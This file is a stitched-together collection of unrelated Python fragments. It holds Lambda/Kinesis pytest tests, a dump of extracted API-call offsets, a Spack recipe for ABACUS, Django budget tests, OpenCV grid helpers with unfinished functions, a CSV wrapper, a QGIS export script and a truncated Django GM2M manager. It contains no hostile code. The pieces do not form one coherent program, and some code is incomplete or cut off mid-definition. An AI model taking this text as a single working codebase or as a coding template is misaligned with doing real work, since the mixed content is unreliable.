def test_send_to_kinesis_stream(search_events, boto3_client, monkeypatch):
"""Tests sending events to a Kinesis stream."""
monkeypatch.setattr("boto3.client", boto3_client)
lambdautils.utils.send_to_kinesis_stream(search_events, "dummy_stream")
boto3_client("kinesis").put_records.call_count == 1
def test_send_to_delivery_stream(search_events, boto3_client, monkeypatch):
"""Tests sending events to a Firehose delivery stream."""
monkeypatch.setattr("boto3.client", boto3_client)
lambdautils.utils.send_to_delivery_stream(search_events, "dummy_stream")
boto3_client("firehose").put_record_batch.call_count == 1
@pytest.mark.parametrize("deserializer, embed_ts", [
[json.loads, False],
[json.loads, "kinesis_timestamp"],
[None, False]])
def test_unpack_kinesis_event(kinesis_event, deserializer, embed_ts):
"""Extracts json-serialized events from a Kinesis events."""
events, shard_id = lambdautils.utils.unpack_kinesis_event(
kinesis_event, deserializer=deserializer, embed_timestamp=embed_ts)
# There should be one event per kinesis record
assert len(events) == len(kinesis_event["Records"])
assert shard_id == kinesis_event["Records"][0]["eventID"].split(":")[0]
if embed_ts:
assert all(embed_ts in ev for ev in events)
| [
"mock.Mock",
"inspect.currentframe",
"json.dumps",
"uuid.uuid4",
"pytest.mark.parametrize",
"pytest.raises",
"sys.path.append"
]
| [((273, 300), 'sys.path.append', 'sys.path.append', (['lambda_dir'], {}), '(lambda_dir)\n', (288, 300), False, 'import sys\n'), ((330, 612), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""key,environment,stage,namespace,table,nkey"""', "[('k', 'e', 's', None, 'e-s-secrets', 'k'), ('k', 'e', None, None,\n 'e-dummystage-secrets', 'k'), ('k', 'e', None, 'n',\n 'e-dummystage-secrets', 'n:k'), ('k', 'e', 's', 'n', 'e-s-secrets', 'n:k')]"], {}), "('key,environment,stage,namespace,table,nkey', [('k',\n 'e', 's', None, 'e-s-secrets', 'k'), ('k', 'e', None, None,\n 'e-dummystage-secrets', 'k'), ('k', 'e', None, 'n',\n 'e-dummystage-secrets', 'n:k'), ('k', 'e', 's', 'n', 'e-s-secrets', 'n:k')]\n )\n", (353, 612), False, 'import pytest\n'), ((2272, 2654), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""key,environment,layer,stage,shard_id,namespace,table,consistent,nkey"""', "[('k', 'e', 'l', 's', None, None, 'e-l-s-state', False, 'k'), ('k', 'e',\n 'l', 's', None, 'n', 'e-l-s-state', False, 'n:k'), ('k', 'e', 'l', 's',\n 's-012', 'n', 'e-l-s-state', True, 's-012:n:k'), ('k', 'e', 'l', 's',\n 's-0001', None, 'e-l-s-state', True, 's-0001:k')]"], {}), "(\n 'key,environment,layer,stage,shard_id,namespace,table,consistent,nkey',\n [('k', 'e', 'l', 's', None, None, 'e-l-s-state', False, 'k'), ('k', 'e',\n 'l', 's', None, 'n', 'e-l-s-state', False, 'n:k'), ('k', 'e', 'l', 's',\n 's-012', 'n', 'e-l-s-state', True, 's-012:n:k'), ('k', 'e', 'l', 's',\n 's-0001', None, 'e-l-s-state', True, 's-0001:k')])\n", (2295, 2654), False, 'import pytest\n'), ((4060, 4418), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""key,value,environment,layer,stage,shard_id,namespace,table,nkey"""', "[('k', 'v', 'e', 'l', 's', None, None, 'e-l-s-state', 'k'), ('k', 'v', 'e',\n 'l', 's', None, 'n', 'e-l-s-state', 'n:k'), ('k', 'v', 'e', 'l', 's',\n 's1', 'n', 'e-l-s-state', 's1:n:k'), ('k', 'v', 'e', 'l', 's', 's2',\n None, 'e-l-s-state', 's2:k')]"], {}), "(\n 'key,value,environment,layer,stage,shard_id,namespace,table,nkey', [(\n 'k', 'v', 'e', 'l', 's', None, None, 'e-l-s-state', 'k'), ('k', 'v',\n 'e', 'l', 's', None, 'n', 'e-l-s-state', 'n:k'), ('k', 'v', 'e', 'l',\n 's', 's1', 'n', 'e-l-s-state', 's1:n:k'), ('k', 'v', 'e', 'l', 's',\n 's2', None, 'e-l-s-state', 's2:k')])\n", (4083, 4418), False, 'import pytest\n'), ((5064, 5395), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""key,environment,layer,stage,shard_id,namespace,table,nkey"""', "[('k', 'e', 'l', 's', None, None, 'e-l-s-state', 'k'), ('k', 'e', 'l', 's',\n None, 'n', 'e-l-s-state', 'n:k'), ('k', 'e', 'l', 's', 's1', 'n',\n 'e-l-s-state', 's1:n:k'), ('k', 'e', 'l', 's', 's2', None,\n 'e-l-s-state', 's2:k')]"], {}), "(\n 'key,environment,layer,stage,shard_id,namespace,table,nkey', [('k', 'e',\n 'l', 's', None, None, 'e-l-s-state', 'k'), ('k', 'e', 'l', 's', None,\n 'n', 'e-l-s-state', 'n:k'), ('k', 'e', 'l', 's', 's1', 'n',\n 'e-l-s-state', 's1:n:k'), ('k', 'e', 'l', 's', 's2', None,\n 'e-l-s-state', 's2:k')])\n", (5087, 5395), False, 'import pytest\n'), ((6705, 6985), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""kstream, fstream, rcalls, kcalls, fcalls, ev"""', "[('a', 'b', 1, 0, 0, {'Records': [{}]}), (None, 'b', 1, 0, 0, {'Records': [\n {}]}), (None, None, 1, 0, 0, None), (None, None, 1, 0, 0, None), ('a',\n 'b', 1, 0, 0, None), ('a', None, 1, 0, 0, None)]"], {}), "('kstream, fstream, rcalls, kcalls, fcalls, ev', [(\n 'a', 'b', 1, 0, 0, {'Records': [{}]}), (None, 'b', 1, 0, 0, {'Records':\n [{}]}), 
(None, None, 1, 0, 0, None), (None, None, 1, 0, 0, None), ('a',\n 'b', 1, 0, 0, None), ('a', None, 1, 0, 0, None)])\n", (6728, 6985), False, 'import pytest\n'), ((9046, 9173), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""deserializer, embed_ts"""', "[[json.loads, False], [json.loads, 'kinesis_timestamp'], [None, False]]"], {}), "('deserializer, embed_ts', [[json.loads, False], [\n json.loads, 'kinesis_timestamp'], [None, False]])\n", (9069, 9173), False, 'import pytest\n'), ((2040, 2063), 'mock.Mock', 'Mock', ([], {'return_value': 'resp'}), '(return_value=resp)\n', (2044, 2063), False, 'from mock import Mock\n'), ((1705, 1717), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1715, 1717), False, 'import uuid\n'), ((1951, 1963), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1961, 1963), False, 'import uuid\n'), ((1979, 1991), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1989, 1991), False, 'import uuid\n'), ((2009, 2021), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (2019, 2021), False, 'import uuid\n'), ((3694, 3742), 'pytest.raises', 'pytest.raises', (['lambdautils.state.StateTableError'], {}), '(lambdautils.state.StateTableError)\n', (3707, 3742), False, 'import pytest\n'), ((3832, 3880), 'pytest.raises', 'pytest.raises', (['lambdautils.state.StateTableError'], {}), '(lambdautils.state.StateTableError)\n', (3845, 3880), False, 'import pytest\n'), ((3951, 3999), 'pytest.raises', 'pytest.raises', (['lambdautils.state.StateTableError'], {}), '(lambdautils.state.StateTableError)\n', (3964, 3999), False, 'import pytest\n'), ((6354, 6383), 'mock.Mock', 'Mock', ([], {'side_effect': 'raise_error'}), '(side_effect=raise_error)\n', (6358, 6383), False, 'from mock import Mock\n'), ((7499, 7530), 'mock.Mock', 'Mock', ([], {'return_value': 'raven_client'}), '(return_value=raven_client)\n', (7503, 7530), False, 'from mock import Mock\n'), ((7593, 7599), 'mock.Mock', 'Mock', ([], {}), '()\n', (7597, 7599), False, 'from mock import Mock\n'), ((7681, 7710), 'mock.Mock', 'Mock', ([], {'return_value': '"""dummydsn"""'}), "(return_value='dummydsn')\n", (7685, 7710), False, 'from mock import Mock\n'), ((7983, 8006), 'pytest.raises', 'pytest.raises', (['KeyError'], {}), '(KeyError)\n', (7996, 8006), False, 'import pytest\n'), ((241, 263), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (261, 263), False, 'import inspect\n'), ((1657, 1669), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1667, 1669), False, 'import uuid\n'), ((5041, 5058), 'json.dumps', 'json.dumps', (['value'], {}), '(value)\n', (5051, 5058), False, 'import json\n')] |
import os
from testr.packages import make_regress_files
regress_files = ['starcheck.txt',
'starcheck/pcad_att_check.txt']
clean = {'starcheck.txt': [(r'\s*Run on.*[\n\r]*', ''),
(os.environ['SKA'], '')],
'starcheck/pcad_att_check.txt': [(os.environ['SKA'], '')]}
make_regress_files(regress_files, clean=clean)
| [
"testr.packages.make_regress_files"
]
| [((319, 365), 'testr.packages.make_regress_files', 'make_regress_files', (['regress_files'], {'clean': 'clean'}), '(regress_files, clean=clean)\n', (337, 365), False, 'from testr.packages import make_regress_files\n')] |
from django.test import TestCase
from .validators import validate_budget_period
from .models import Budget, Expense, Payment
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
class ExpenseTestCases(TestCase):
def setUp(self) -> None:
user = User.objects.create_user('joe', email='<EMAIL>', password='<PASSWORD>')
budget = Budget.objects.create(name='My budget',
creation_date='2019-05-03',
owner=user,
description='The budget of champions.'
)
Expense.objects.create(name='Water park visit',
amount=30.00,
period='1-monthly',
payee='Super awesome Water parks',
description='I will go to the water park.',
date='2019-06-04',
budget=budget
)
Payment.objects.create(name='Paycheck',
amount=4000.0,
period='1-monthly',
description='Where the Mullah comes from',
date='2017-01-12',
origin='The big boss fom up top in HR.',
budget=budget
)
def test_proper_str_formation(self):
budget = Budget.objects.get(pk=1)
expense = Expense.objects.get(pk=1)
payment = Payment.objects.get(pk=1)
self.assertEquals(budget.__str__(), 'My budget: joe', 'The budget was not created properly.')
        self.assertEquals(expense.__str__(), 'Water park visit: 30.0', 'The expense was not created properly.')
        self.assertEquals(payment.__str__(), 'Paycheck: 4000.0', 'The string function on payment is not working properly.')
class BudgetPeriodValidatorTestCase(TestCase):
valid_cases = [
'1-daily',
'1-onetime',
'1-annually',
'5-quarterly',
'7-weekly',
'3-annually',
'10-monthly',
'19-weekly',
'99-daily'
]
invalid_cases = [
'0.4-daily',
'0-weekly',
'ad-annually',
'100-weekly',
'4.6-quarterly',
'-31-daily',
'whoot-quarterly',
'59-zoobly',
'5-onetime',
'03-monthly',
]
def test_budget_period_validator(self):
for c in self.valid_cases:
self.assertEquals(validate_budget_period(c), None, f'failed on {c}')
def test_budget_period_validator_fail(self):
for c in self.invalid_cases:
self.assertRaises(ValidationError, validate_budget_period, c)
def test_validator_in_expense_model_creation_invalid(self):
user = User.objects.create(username='joe', email='<EMAIL>', password='<PASSWORD>')
budget = Budget.objects.create(name='My Budget',
creation_date='2019-04-13',
owner=user,
)
for c in self.invalid_cases:
self.assertRaises(Exception, Expense.objects.create,
name=c + '1',
amount=15.0,
date='2014-05-06',
period=c,
budget=budget
)
| [
"django.contrib.auth.models.User.objects.create",
"django.contrib.auth.models.User.objects.create_user"
]
| [((301, 372), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', (['"""joe"""'], {'email': '"""<EMAIL>"""', 'password': '"""<PASSWORD>"""'}), "('joe', email='<EMAIL>', password='<PASSWORD>')\n", (325, 372), False, 'from django.contrib.auth.models import User\n'), ((2948, 3023), 'django.contrib.auth.models.User.objects.create', 'User.objects.create', ([], {'username': '"""joe"""', 'email': '"""<EMAIL>"""', 'password': '"""<PASSWORD>"""'}), "(username='joe', email='<EMAIL>', password='<PASSWORD>')\n", (2967, 3023), False, 'from django.contrib.auth.models import User\n')] |
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import re
from spack.package import *
class Abacus(MakefilePackage):
"""ABACUS (Atomic-orbital Based Ab-initio Computation at UStc)
is an open-source computer code package aiming
for large-scale electronic-structure simulations
from first principles"""
maintainers = ["bitllion"]
homepage = "http://abacus.ustc.edu.cn/"
git = "https://github.com/abacusmodeling/abacus-develop.git"
url = "https://github.com/abacusmodeling/abacus-develop/archive/refs/tags/v2.2.1.tar.gz"
version("develop", branch="develop")
version(
"2.2.3",
sha256="88dbf6a3bdd907df3e097637ec8e51fde13e2f5e0b44f3667443195481320edf",
)
version(
"2.2.2",
sha256="4a7cf2ec6e43dd5c53d5f877a941367074f4714d93c1977a719782957916169e",
)
version(
"2.2.1",
sha256="14feca1d8d1ce025d3f263b85ebfbebc1a1efff704b6490e95b07603c55c1d63",
)
version(
"2.2.0",
sha256="09d4a2508d903121d29813a85791eeb3a905acbe1c5664b8a88903f8eda64b8f",
)
variant("openmp", default=True, description="Enable OpenMP support")
depends_on("elpa+openmp", when="+openmp")
depends_on("elpa~openmp", when="~openmp")
depends_on("cereal")
depends_on("libxc")
depends_on("fftw")
# MPI is a necessary dependency
depends_on("mpi", type=("build", "link", "run"))
depends_on("mkl")
build_directory = "source"
def edit(self, spec, prefix):
if "+openmp" in spec:
inc_var = "_openmp-"
system_var = (
"ELPA_LIB = -L${ELPA_LIB_DIR} -lelpa_openmp -Wl, -rpath=${ELPA_LIB_DIR}"
)
else:
inc_var = "-"
system_var = (
"ELPA_LIB = -L${ELPA_LIB_DIR} -lelpa -Wl,-rpath=${ELPA_LIB_DIR}"
)
tempInc = (
"\
FORTRAN = ifort\n\
CPLUSPLUS = icpc\n\
CPLUSPLUS_MPI = mpiicpc\n\
LAPACK_DIR = $(MKLROOT)\n\
FFTW_DIR = %s\n\
ELPA_DIR = %s\n\
ELPA_INCLUDE = -I${ELPA_DIR}/include/elpa%s%s\n\
CEREAL_DIR = %s\n\
OBJ_DIR = obj\n\
OBJ_DIR_serial = obj\n\
NP = 14\n"
% (
spec["fftw"].prefix,
spec["elpa"].prefix,
inc_var,
"{0}".format(spec["elpa"].version),
spec["cereal"].prefix,
)
)
with open(self.build_directory + "/Makefile.vars", "w") as f:
f.write(tempInc)
lineList = []
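        # Drop the stock ELPA include/lib lines from Makefile.system;
        # the Spack-resolved ELPA settings are appended below instead.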
Pattern1 = re.compile("^ELPA_INCLUDE_DIR")
Pattern2 = re.compile("^ELPA_LIB\\s*= ")
with open(self.build_directory + "/Makefile.system", "r") as f:
while True:
line = f.readline()
if not line:
break
elif Pattern1.search(line):
pass
elif Pattern2.search(line):
pass
else:
lineList.append(line)
with open(self.build_directory + "/Makefile.system", "w") as f:
for i in lineList:
f.write(i)
with open(self.build_directory + "/Makefile.system", "a") as f:
f.write(system_var)
def install(self, spec, prefix):
install_tree("bin", prefix.bin)
| [
"re.compile"
]
| [((2657, 2688), 're.compile', 're.compile', (['"""^ELPA_INCLUDE_DIR"""'], {}), "('^ELPA_INCLUDE_DIR')\n", (2667, 2688), False, 'import re\n'), ((2708, 2737), 're.compile', 're.compile', (['"""^ELPA_LIB\\\\s*= """'], {}), "('^ELPA_LIB\\\\s*= ')\n", (2718, 2737), False, 'import re\n')] |
import cv2
import numpy as np
def process_core(image):
'''
Returns an inverted preprocessed binary image, with noise
reduction achieved with greyscaling, Gaussian Blur, Otsu's Threshold, and
an open morph.
'''
#apply greyscaling, Gaussian Blur, and Otsu's Threshold
greyscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(greyscale, (3, 3), 0)
threshold = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]
#apply an open morph to invert image to remove noise
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))
invert = 255 - cv2.morphologyEx(threshold, cv2.MORPH_OPEN, kernel, iterations=1)
return invert
def find_houghlines(image, width, height):
hough_lines = None
lines = cv2.HoughLinesP(image, 1, np.pi/180, 50, minLineLength=50, maxLineGap=5)
    if lines is not None and len(lines) != 0:
        # generate a blank single-channel black image to draw the detected lines on
        hough_lines = np.zeros((height, width), dtype=np.uint8)
for line in lines:
x1, y1, x2, y2 = line[0]
cv2.line(hough_lines, (x1, y1), (x2, y2), (255, 255, 255), 2)
return hough_lines
def find_bounds(image):
rect_bounds = None
#Run contour recognition
contours, _ = cv2.findContours(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#Take list of sorted contours by largest area to smallest area
#If at least one contour is identified, can process visual approx. of contour bounds
if len(sorted(contours, key=cv2.contourArea, reverse=True)) > 0:
contour_bounds = None
#Pre-determined image size factor constant
SFACTOR = 20
for contour in contours:
#Minimum intended size of a single cell is not reached, likely a cutoff, not worth approx.
            if (image.shape[0] * image.shape[1]) / SFACTOR > cv2.contourArea(contour):
break
approximation = cv2.approxPolyDP(contour, cv2.arcLength(contour, True), True)
#This means that the approximated polygon is a quad
if len(approximation) == 4:
contour_bounds = approximation
break
if contour_bounds is not None:
rect_bounds = np.zeros((4, 2), dtype=np.float32)
corners = contour_bounds.reshape(-1, 2)
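            # Order the corners with the sum/diff trick: smallest x+y -> top-left,
            # largest x+y -> bottom-right, smallest y-x -> top-right, largest y-x -> bottom-left.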
rect_bounds[0] = corners[np.argmin(contour_bounds.sum(axis=1))]
rect_bounds[2] = corners[np.argmax(contour_bounds.sum(axis=1))]
rect_bounds[1] = corners[np.argmin(np.diff(corners, axis=1))]
rect_bounds[3] = corners[np.argmax(np.diff(corners, axis=1))]
return rect_bounds
#Transform the perspective to render as if looking down on paper (top-down view)
def transform(image, perspective):
pass
#Process the grid based on expected clean binary image input
def process_grid(image, width, height):
grid = None
detected = False
hough_lines = find_houghlines(image, width, height)
| [
"cv2.HoughLinesP",
"cv2.threshold",
"cv2.arcLength",
"cv2.line",
"numpy.diff",
"cv2.contourArea",
"cv2.morphologyEx",
"numpy.zeros",
"cv2.cvtColor",
"cv2.findContours",
"cv2.GaussianBlur",
"cv2.getStructuringElement"
]
| [((308, 347), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2GRAY'], {}), '(image, cv2.COLOR_BGR2GRAY)\n', (320, 347), False, 'import cv2\n'), ((359, 397), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['greyscale', '(3, 3)', '(0)'], {}), '(greyscale, (3, 3), 0)\n', (375, 397), False, 'import cv2\n'), ((561, 610), 'cv2.getStructuringElement', 'cv2.getStructuringElement', (['cv2.MORPH_RECT', '(3, 3)'], {}), '(cv2.MORPH_RECT, (3, 3))\n', (586, 610), False, 'import cv2\n'), ((803, 877), 'cv2.HoughLinesP', 'cv2.HoughLinesP', (['image', '(1)', '(np.pi / 180)', '(50)'], {'minLineLength': '(50)', 'maxLineGap': '(5)'}), '(image, 1, np.pi / 180, 50, minLineLength=50, maxLineGap=5)\n', (818, 877), False, 'import cv2\n'), ((1327, 1394), 'cv2.findContours', 'cv2.findContours', (['image', 'cv2.RETR_EXTERNAL', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n', (1343, 1394), False, 'import cv2\n'), ((414, 482), 'cv2.threshold', 'cv2.threshold', (['blur', '(0)', '(255)', '(cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)'], {}), '(blur, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n', (427, 482), False, 'import cv2\n'), ((630, 695), 'cv2.morphologyEx', 'cv2.morphologyEx', (['threshold', 'cv2.MORPH_OPEN', 'kernel'], {'iterations': '(1)'}), '(threshold, cv2.MORPH_OPEN, kernel, iterations=1)\n', (646, 695), False, 'import cv2\n'), ((1006, 1047), 'numpy.zeros', 'np.zeros', (['(height, width)'], {'dtype': 'np.uint8'}), '((height, width), dtype=np.uint8)\n', (1014, 1047), True, 'import numpy as np\n'), ((1133, 1194), 'cv2.line', 'cv2.line', (['hough_lines', '(x1, y1)', '(x2, y2)', '(255, 255, 255)', '(2)'], {}), '(hough_lines, (x1, y1), (x2, y2), (255, 255, 255), 2)\n', (1141, 1194), False, 'import cv2\n'), ((2339, 2373), 'numpy.zeros', 'np.zeros', (['(4, 2)'], {'dtype': 'np.float32'}), '((4, 2), dtype=np.float32)\n', (2347, 2373), True, 'import numpy as np\n'), ((1923, 1947), 'cv2.contourArea', 'cv2.contourArea', (['contour'], {}), '(contour)\n', (1938, 1947), False, 'import cv2\n'), ((2038, 2066), 'cv2.arcLength', 'cv2.arcLength', (['contour', '(True)'], {}), '(contour, True)\n', (2051, 2066), False, 'import cv2\n'), ((2651, 2675), 'numpy.diff', 'np.diff', (['corners'], {'axis': '(1)'}), '(corners, axis=1)\n', (2658, 2675), True, 'import numpy as np\n'), ((2725, 2749), 'numpy.diff', 'np.diff', (['corners'], {'axis': '(1)'}), '(corners, axis=1)\n', (2732, 2749), True, 'import numpy as np\n')] |
"""
MIT License
Copyright (c) 2018 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import datetime
import csv
import os
class CSVReader(object):
"""Wrapper for reading csv files.
Takes just the filepath as an argument.
Use the iterrecords() generator method for large data sets for increased performance.
"""
def __init__(self, file_path, delimiter=','):
self.file_path = file_path
self.delimiter = delimiter
def read_to_list(self):
"""Returns the records in the csv as a list[]
Each record is a dictionary
"""
records = []
with open(self.file_path) as source:
reader = csv.DictReader(source,
delimiter=self.delimiter)
for row in reader:
records.append(row)
return records
def read_to_dict(self, key_field):
"""Returns the records in the csv as a dictionary.
The key value is specified by the key_field argument for each record
"""
records = {}
with open(self.file_path) as source:
reader = csv.DictReader(source,
delimiter=self.delimiter)
self.headers = reader.fieldnames
if key_field in self.headers:
for row in reader:
if not row[key_field] in records:
records[row[key_field]] = row
else:
raise Exception('The key provided does not have unique values.')
else:
raise KeyError('The key provided does not exist')
return records
def iterrecords(self):
"""Generator method that provides a more efficient way to iterate records.
for record in instance.iterrecords():
print(record)
"""
records = []
with open(self.file_path) as source:
reader = csv.DictReader(source,
delimiter=self.delimiter)
for row in reader:
yield row
class CSVWriter(object):
"""Wrapper for writing csv files.
takes the file path and a list of headers as arguments
"""
def __init__(self, file_path, headers):
self.headers = headers
self.file_path = file_path
def write_from_list(self, records=[]):
"""Writes the csv to the indicated file_path
taking a list[] of records as the argument
where each record is a dictionary.
Only the fields in self.headers will be written to the csv.
But extra fields can be passed, they will just be skipped over.
"""
if isinstance(records, list):
            with open(self.file_path, 'w', newline='') as csvfile:
writer = csv.DictWriter(csvfile,
fieldnames=self.headers)
writer.writeheader()
for record in records:
if isinstance(record, dict):
row = {field: record[field] for field in self.headers}
writer.writerow(row)
else:
raise Exception('Items in list must be of type dict')
else:
raise Exception('Must pass a list object as the records list')
return self.file_path
def write_from_dict(self, records={}):
"""Writes the csv to the indicated file_path
taking a dict{} of records as the argument
where each item in the dict{} is also a dict{}
"""
        with open(self.file_path, 'w', newline='') as csvfile:
writer = csv.DictWriter(csvfile,
fieldnames=self.headers)
writer.writeheader()
for key, record in records.items():
row = {field: record[field] for field in self.headers}
writer.writerow(row)
return self.file_path
def reader(file_path='', delimiter=','):
"""Returns a CSVReader object
"""
if os.path.isfile(file_path):
if os.access(file_path, os.R_OK):
return CSVReader(file_path, delimiter=delimiter)
else:
raise Exception('{fname} exists but is not readable.'.format(fname=file_path))
else:
raise Exception('{fname} does not exist'.format(fname=file_path))
def writer(file_path='', headers=[]):
"""Returns a CSVWriter object
"""
if not os.path.isfile(file_path):
if isinstance(headers, list):
return CSVWriter(file_path=file_path, headers=headers)
else:
raise Exception('Headers need to be in a list object.')
else:
raise Exception('{fname} is already a file. Please write to a new location.'.format(fname=file_path))
def the_date():
return datetime.date.today().strftime('%m_%d_%Y')
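# Illustrative usage sketch (the file names and headers below are hypothetical):
#   r = reader('people.csv')
#   for record in r.iterrecords():
#       print(record)
#   w = writer('out.csv', headers=['name', 'age'])
#   w.write_from_list([{'name': 'Ada', 'age': 36}])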
| [
"csv.DictWriter",
"csv.DictReader",
"os.access",
"os.path.isfile",
"datetime.date.today"
]
| [((5034, 5059), 'os.path.isfile', 'os.path.isfile', (['file_path'], {}), '(file_path)\n', (5048, 5059), False, 'import os\n'), ((5072, 5101), 'os.access', 'os.access', (['file_path', 'os.R_OK'], {}), '(file_path, os.R_OK)\n', (5081, 5101), False, 'import os\n'), ((5445, 5470), 'os.path.isfile', 'os.path.isfile', (['file_path'], {}), '(file_path)\n', (5459, 5470), False, 'import os\n'), ((1667, 1715), 'csv.DictReader', 'csv.DictReader', (['source'], {'delimiter': 'self.delimiter'}), '(source, delimiter=self.delimiter)\n', (1681, 1715), False, 'import csv\n'), ((2117, 2165), 'csv.DictReader', 'csv.DictReader', (['source'], {'delimiter': 'self.delimiter'}), '(source, delimiter=self.delimiter)\n', (2131, 2165), False, 'import csv\n'), ((2942, 2990), 'csv.DictReader', 'csv.DictReader', (['source'], {'delimiter': 'self.delimiter'}), '(source, delimiter=self.delimiter)\n', (2956, 2990), False, 'import csv\n'), ((4638, 4686), 'csv.DictWriter', 'csv.DictWriter', (['csvfile'], {'fieldnames': 'self.headers'}), '(csvfile, fieldnames=self.headers)\n', (4652, 4686), False, 'import csv\n'), ((5814, 5835), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (5833, 5835), False, 'import datetime\n'), ((3790, 3838), 'csv.DictWriter', 'csv.DictWriter', (['csvfile'], {'fieldnames': 'self.headers'}), '(csvfile, fieldnames=self.headers)\n', (3804, 3838), False, 'import csv\n')] |
from PyQt4.QtGui import QImage, QPainter
from PyQt4.QtCore import QSize
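# Note: intended for the QGIS 2.x Python console, where `iface`, QgsMapSettings and
# QgsMapRendererCustomPainterJob are already available without explicit imports.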
# configure the output image
width = 800
height = 600
dpi = 92
img = QImage(QSize(width, height), QImage.Format_RGB32)
img.setDotsPerMeterX(dpi / 25.4 * 1000)
img.setDotsPerMeterY(dpi / 25.4 * 1000)
# get the map layers and extent
layers = [ layer.id() for layer in iface.legendInterface().layers() ]
extent = iface.mapCanvas().extent()
# configure map settings for export
mapSettings = QgsMapSettings()
mapSettings.setMapUnits(0)
mapSettings.setExtent(extent)
mapSettings.setOutputDpi(dpi)
mapSettings.setOutputSize(QSize(width, height))
mapSettings.setLayers(layers)
mapSettings.setFlags(QgsMapSettings.Antialiasing | QgsMapSettings.UseAdvancedEffects | QgsMapSettings.ForceVectorOutput | QgsMapSettings.DrawLabeling)
# configure and run painter
p = QPainter()
p.begin(img)
mapRenderer = QgsMapRendererCustomPainterJob(mapSettings, p)
mapRenderer.start()
mapRenderer.waitForFinished()
p.end()
# save the result
img.save("C:/temp/custom_export.png","png") | [
"PyQt4.QtGui.QPainter",
"PyQt4.QtCore.QSize"
]
| [((845, 855), 'PyQt4.QtGui.QPainter', 'QPainter', ([], {}), '()\n', (853, 855), False, 'from PyQt4.QtGui import QImage, QPainter\n'), ((154, 174), 'PyQt4.QtCore.QSize', 'QSize', (['width', 'height'], {}), '(width, height)\n', (159, 174), False, 'from PyQt4.QtCore import QSize\n'), ((606, 626), 'PyQt4.QtCore.QSize', 'QSize', (['width', 'height'], {}), '(width, height)\n', (611, 626), False, 'from PyQt4.QtCore import QSize\n')] |
from django.db import router
from django.db.models import Q, Manager
from django.db import connections
from .contenttypes import ct, get_content_type
from .query import GM2MTgtQuerySet
class GM2MBaseManager(Manager):
    use_in_migrations = True
def __init__(self, instance):
super(GM2MBaseManager, self).__init__()
self.model = self._model # see create_gm2m_related_manager
self.instance = instance
self.pk = instance.pk
self.core_filters = {}
def get_queryset(self):
try:
return self.instance \
._prefetched_objects_cache[self.prefetch_cache_name]
except (AttributeError, KeyError):
db = self._db or router.db_for_read(self.instance.__class__,
instance=self.instance)
return self._get_queryset(using=db)._next_is_sticky() \
.filter(**self.core_filters)
def _get_queryset(self, using):
return super(GM2MBaseManager, self).get_queryset().using(using)
def get_prefetch_queryset(self, instances, queryset=None):
db = self._db or router.db_for_read(self.model,
instance=instances[0])
if queryset is None:
queryset = self._get_queryset(db)
qs, rel_obj_attr, instance_attr = \
self._get_prefetch_queryset_params(instances, queryset, db)
return (qs,
rel_obj_attr,
instance_attr,
False,
self.prefetch_cache_name)
def _get_extra_queryset(self, queryset, q, extra_fields, db):
join_table = self.through._meta.db_table
connection = connections[db]
qn = connection.ops.quote_name
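        # Expose the join-table columns as extra '_prefetch_related_val_*' selects
        # so prefetch_related() can map fetched rows back to their source instances.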
extra = dict(select=dict(
('_prefetch_related_val_%s' % f.attname,
'%s.%s' % (qn(join_table), qn(f.column)))
for f in extra_fields))
return queryset.using(db)._next_is_sticky().filter(q).extra(**extra)
def _check_through_model(self, method_name):
# If the GM2M relation has an intermediary model,
# the add and remove methods are not available.
if not self.through._meta.auto_created:
opts = self.through._meta
raise AttributeError(
'Cannot use %s() on a ManyToManyField which specifies an '
'intermediary model. Use %s.%s\'s Manager instead.'
% (method_name, opts.app_label, opts.object_name))
def _do_add(self, db, through_objs):
"""
Performs items addition
"""
# Add the new entries in the db table
self.through._default_manager.using(db).bulk_create(through_objs)
def add(self, *objs):
"""
Adds objects to the GM2M field
